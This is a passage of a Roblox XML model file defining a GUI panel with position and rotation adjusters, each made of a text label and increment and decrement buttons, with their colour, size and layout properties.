								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX28">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291414473</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus0</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>32</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">~</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX29">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291414473</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus0</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-48</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">~</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
					</Item>
					<Item class="Frame" referent="RBX30">
						<Properties>
							<bool name="Active">false</bool>
							<Color3 name="BackgroundColor3">4293782767</Color3>
							<float name="BackgroundTransparency">1</float>
							<Color3 name="BorderColor3">4278190080</Color3>
							<int name="BorderSizePixel">1</int>
							<string name="Name">PosY</string>
							<UDim2 name="Position">
								<XS>0</XS>
								<XO>5</XO>
								<YS>0</YS>
								<YO>57</YO>
							</UDim2>
							<UDim2 name="Size">
								<XS>1</XS>
								<XO>-10</XO>
								<YS>0</YS>
								<YO>16</YO>
							</UDim2>
							<token name="SizeConstraint">0</token>
							<bool name="Visible">true</bool>
							<int name="ZIndex">1</int>
							<bool name="archivable">true</bool>
						</Properties>
						<Item class="TextLabel" referent="RBX31">
							<Properties>
								<bool name="Active">false</bool>
								<Color3 name="BackgroundColor3">4294769916</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Text</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>48</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<UDim2 name="Size">
									<XS>1</XS>
									<XO>-96</XO>
									<YS>1</YS>
									<YO>0</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">Y: 0</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX32">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4284440415</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus2</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>0</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">--</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX33">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291348680</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus1</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-32</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">+</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX34">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291348680</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus1</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">-</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX35">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4284440415</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus2</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-16</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">++</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX36">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291414473</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus0</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>32</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">~</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX37">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291414473</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus0</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-48</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">~</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
					</Item>
					<Item class="Frame" referent="RBX38">
						<Properties>
							<bool name="Active">false</bool>
							<Color3 name="BackgroundColor3">4293848560</Color3>
							<float name="BackgroundTransparency">1</float>
							<Color3 name="BorderColor3">4278190080</Color3>
							<int name="BorderSizePixel">1</int>
							<string name="Name">PosZ</string>
							<UDim2 name="Position">
								<XS>0</XS>
								<XO>5</XO>
								<YS>0</YS>
								<YO>73</YO>
							</UDim2>
							<UDim2 name="Size">
								<XS>1</XS>
								<XO>-10</XO>
								<YS>0</YS>
								<YO>16</YO>
							</UDim2>
							<token name="SizeConstraint">0</token>
							<bool name="Visible">true</bool>
							<int name="ZIndex">1</int>
							<bool name="archivable">true</bool>
						</Properties>
						<Item class="TextLabel" referent="RBX39">
							<Properties>
								<bool name="Active">false</bool>
								<Color3 name="BackgroundColor3">4294835709</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Text</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>48</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<UDim2 name="Size">
									<XS>1</XS>
									<XO>-96</XO>
									<YS>1</YS>
									<YO>0</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">Z: 0</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX40">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4284440415</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus2</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>0</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">--</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX41">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291348680</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus1</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-32</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">+</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX42">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291348680</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus1</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">-</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX43">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4284440415</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus2</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-16</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">++</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX44">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291414473</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus0</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>32</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">~</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX45">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291414473</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus0</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-48</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">~</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
					</Item>
					<Item class="Frame" referent="RBX46">
						<Properties>
							<bool name="Active">false</bool>
							<Color3 name="BackgroundColor3">4293716974</Color3>
							<float name="BackgroundTransparency">1</float>
							<Color3 name="BorderColor3">4279970357</Color3>
							<int name="BorderSizePixel">1</int>
							<string name="Name">RotX</string>
							<UDim2 name="Position">
								<XS>0</XS>
								<XO>5</XO>
								<YS>0</YS>
								<YO>131</YO>
							</UDim2>
							<UDim2 name="Size">
								<XS>1</XS>
								<XO>-10</XO>
								<YS>0</YS>
								<YO>16</YO>
							</UDim2>
							<token name="SizeConstraint">0</token>
							<bool name="Visible">true</bool>
							<int name="ZIndex">1</int>
							<bool name="archivable">true</bool>
						</Properties>
						<Item class="TextLabel" referent="RBX47">
							<Properties>
								<bool name="Active">false</bool>
								<Color3 name="BackgroundColor3">4294704123</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Text</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>32</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<UDim2 name="Size">
									<XS>1</XS>
									<XO>-64</XO>
									<YS>1</YS>
									<YO>0</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">X: 0</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX48">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4284440415</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus2</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>0</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">--</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX49">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291348680</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus1</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-32</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">+</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX50">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291348680</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus1</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">-</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX51">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4284440415</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus2</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-16</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">++</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
					</Item>
					<Item class="Frame" referent="RBX52">
						<Properties>
							<bool name="Active">false</bool>
							<Color3 name="BackgroundColor3">4293782767</Color3>
							<float name="BackgroundTransparency">1</float>
							<Color3 name="BorderColor3">4278190080</Color3>
							<int name="BorderSizePixel">1</int>
							<string name="Name">RotY</string>
							<UDim2 name="Position">
								<XS>0</XS>
								<XO>5</XO>
								<YS>0</YS>
								<YO>147</YO>
							</UDim2>
							<UDim2 name="Size">
								<XS>1</XS>
								<XO>-10</XO>
								<YS>0</YS>
								<YO>16</YO>
							</UDim2>
							<token name="SizeConstraint">0</token>
							<bool name="Visible">true</bool>
							<int name="ZIndex">1</int>
							<bool name="archivable">true</bool>
						</Properties>
						<Item class="TextLabel" referent="RBX53">
							<Properties>
								<bool name="Active">false</bool>
								<Color3 name="BackgroundColor3">4294769916</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Text</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>32</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<UDim2 name="Size">
									<XS>1</XS>
									<XO>-64</XO>
									<YS>1</YS>
									<YO>0</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">Y: 0</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX54">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4284440415</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus2</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>0</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">--</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX55">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291348680</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus1</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-32</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">+</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX56">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291348680</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus1</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">-</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX57">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4284440415</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus2</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-16</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">++</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
					</Item>
					<Item class="Frame" referent="RBX58">
						<Properties>
							<bool name="Active">false</bool>
							<Color3 name="BackgroundColor3">4293848560</Color3>
